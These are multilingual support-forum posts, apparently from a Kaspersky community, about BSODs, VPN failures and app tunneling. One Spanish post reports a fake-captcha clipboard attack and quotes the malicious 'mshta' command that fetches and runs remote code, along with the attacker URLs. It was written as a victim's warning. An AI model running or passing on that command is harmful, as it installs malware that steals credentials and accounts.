      Ошибка KMODE_EXCEPTION_NOT_HANDLED при подтверждении изменения настроек

      Достаточно очевидно, что это какая-то локальная проблема. Также очевидно, что на форуме ее не решить. Вообще GUI антивируса работает на .NET Desktop Runtime. В настоящее время это 6.0.26, которая встроена в сам антивирус. Можно предположить, что источник проблемы где-то здесь. Если для вас проблема критична, то поскольку по бесплатному антивирусу поддержка не оказывается, надо либо отказываться от Касперского, либо ставить триальную версию и общаться с техподдержкой.

      Kaspersky VPN funktioniert nach Funktionsupdate für Windows 10, Version22H2 nicht mehr

      An alle freundlichen Helfer: Ungeduldig, wie ich bin, habe ich das alte VPN deinstalliert und versucht, es komplett neu zu installieren. Das ist mir über »Mein Kaspersky« tatsächlich gelungen. Die Installation lief reibungslos und nun habe ich wohl sogar die aktuelle Version 21.19.7.527 1. Es läuft wieder einwandfrei und ich kann jetzt in Ruhe meine Entscheidung bezüglich einer neuen Version treffen. Ich möchte mich bei allen Beteiligten herzlich bedanken und wünsche Euch noch eine besinnliche Adventszeit und ein frohes Weihnachtsfest! Liebe Grüße Ulrich

      Amigos necesito su ayuda

      Buen dia comunidad, el jueves 19 a primeras horas de la madrugada mientras buscaba informacion sobre una escuela me tope con esta escuela aqui en Peru : https: //lavictoriagakko.edu.pe (tener cuidado con la web). Dentro de la pagina se mantiene la estructura de una pagina de escuela normal hasta que segundos despues aparece el captcha "no soy un robot" para hacer check en las figuras de autos. Luego de ello aparece un mensaje que que dice que algo asi como "para reiniciar la pagina" presion "Ctrl + r" , pega con "Ctrl + v" este codigo para recargar la pagina, el tema es que me sorprendio que algo ya este listo para pegar y quise ver por que se me habia copiado (en el portapapeles) un ejecutable solo por haber entrado a esa pagina, entonces fui al comando "Ctrl + r" presiono "Ctrl + v" (para visualizar que codigo malicioso era) y de casualidad lo termino ejecutando =( el codigo ejecutado en la ventana run de windows fue: mshta https: //microsoft-dns-reload-6y.pages.dev # "Microsoft Windows: DNS service Reload and Restart UP Tengan cuidado con ello. El problema es que en ese momento solo tenia instalado el windows defender (tengo windows 11 up to date). Algunas horas despues empezo el problema: entraron a mi cuenta de twitter e instagram (ambas con la configuracion de recordar credenciales cada vez que se iniciaba el chrome) , se detecto un inicio de sesion desde CA, USA en mi twitter y eliminaron mi instagram previamente habiendo cambiado el correo asociado a la cuenta por una de dominio @tenaent.com). La computadoraestuvo encendida un par de horas ese luego de la execucion de dicho executable malicioso en el cual use el scaner profundo de windows defender (que no hayo nada raro). Ese dia solo apague la computadora y al dia siguiente adquiri el karpersky premium, el cual arrojo troyanos HEUR:Trojan.Script.Generic (https: //bsc-dataseed1.binance.org https: //microsoft-dns-reload-6y.pages.dev), vinculo malicioso(https: //saaadnesss.shop/check) backdoors como "amenazas", asimismo de en algunos momentos aparecia "shell host is using camara web" pero Karspersky me daba la opcion de bloquear ello. De antemano muchas gracias a quien lea todo esto, cualquier ayuda es bienvenida porque lo que mas me preocupa es saber que informacion han robado en el tiempo que no era detectado.

      Nicht nur die KIS löschen (Verzeihung -> deinstallieren) sondern auch die VPN. Dann eine Variante mit integrierten VPN installieren. Das wird schon "gutgehen". 🙃 Wenn nicht, wir helfen gerne. (ich erlaube mir, hier im plural zu sprechen). ((ist "plural" eigentlich auf zwei Personen beschränkt ? Ich hoffe nicht. 🙂 )) ((( sorry für die Plauderlaune)))

      Ошибка KMODE_EXCEPTION_NOT_HANDLED при подтверждении изменения настроек

      ОС: Windows 11 Pro 24H2 сборка 26100.2605 - чистая, установлена внутри виртуальной машины Proxmox 8.3 две недели назад. Kaspersky Free 21.19.7.527(b) - установлен стандартно через файл установки, получена бесплатная лицензия через my kaspersky. Сразу после установки столкнулся с BSOD ошибкой KMODE_EXCEPTION_NOT_HANDLED при любой попытке изменения настроек антивируса. При любом вызове пользовательского диалога антивируса система падает в эту ошибку (подтверждение сохранения настроек, после выбора действия реакции на угрозу и т.д.). Эта же ошибка возникает при попытке удаления антивируса. Удалял актуальной версией утилиты kavremover, но после повторной установки снова столкнулся с этой проблемой. Минидампы ОС не содержат никакой информации о процессе или драйвере, вызвавшем этот сбой. Опытным путём было выяснено, что без проброшенной в виртуальную машину PCIe видеокарты GeForce RTX 2070 Super, ошибка не воспроизводится. Удаление драйвера видеокарты, замена на базовый драйвер от Microsoft или любой другой драйвер, проблему не решило. Сама видеокарта функционирует абсолютно нормально. Падений системы на тестах видеокарты или в играх нет, BSOD возникает только при пользовательском взаимодействии с антивирусом.

      App tunneling not working properly

      Already tried both whitelist and blacklist methods: I've also added everything game/launcher related - in fact the Apps that never connect via VPN seems to be the one setting that triggers Server distribution error, while Apps that always connect via VPN triggers the Global distribution error. I've just installed the AV - no license however as i don't plan on switching AVs - and there doesn't seem to be any other logs in any tab besides the AV task starting - unless there's something i've not set up Yes, at the moment i am using the Fastest server available Considering that changing the VPN protocol also did not yield any results, i will try to contact support if there's nothing else that we have missed
